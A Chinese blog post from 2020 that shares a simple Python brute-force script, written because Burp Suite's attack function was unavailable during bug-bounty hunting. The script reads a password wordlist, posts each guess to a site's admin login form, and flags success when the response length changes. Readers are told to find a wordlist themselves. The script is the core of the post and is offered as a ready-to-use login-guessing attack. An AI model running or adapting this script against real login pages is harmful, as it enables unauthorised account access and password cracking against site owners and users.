[爆破小记]分享一个简单的爆破脚本

WEB安全   DYBOY  87364 2020-10-17 

标签: web安全 暴力破解

某天晚上,看到某SRC公众号发了推文,想着赶紧撸一波漏洞,已经好久没有挖洞的我,赶紧打开了我的burpsuite神器,然而抓包一套流程下来,发现并没有attack按钮?破解burpsuite的大神表示不再维护,所以自己写了一个简单的python脚本

立一个FLAG,下次一定完善这个爆破脚本

TASK:

  • 支持POST爆破
  • 支持类似burp一样的变量识别
  • 支持字段排列组合
  • 支持数据包对比、排序

能用的脚本如下:

import requests
url="https://blog.dyboy.cn/admin/"
n=1
username=input("请输入用户名")
data2={'username':username,'password':'00000000','Login':'Login'}
headers={'cookie':'name=dyboy'}
response2=requests.post(url,data2,headers=headers)
text2=response2.text
f=open("pass.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.post(url,data1,headers=headers)
    text1=response1.text
    print("第:", n, "次,尝试密码:", password, "HTTP包长度:", len(text1))
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break

脚本文件中的pass.txt,小伙伴们自己去找就好了,一行一个password!

上一篇
[CSS]背景图片中平铺与拉伸
下一篇
[翻译]你真的会用console.log吗?

版权声明:《 [爆破小记]分享一个简单的爆破脚本 》为DYBOY原创文章,转载请注明出处!
最后编辑:2020-10-17 12:10:20

相关推荐

16686人看过

一道CTF题目的探究

8693人看过

Memached代码执行漏洞复现视频+POC

10965人看过

VIM不正常退出产生的swp文件将泄漏敏感信息

15717人看过

ThreatScan-端口扫描的实现

11146人看过

[笔记]Mysql通过日志拿shell

发表评论 / Comment

用心评论~

金玉良言 / Appraise
1LV 1
2020-11-19 02:20
在哪里工作
回复

Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23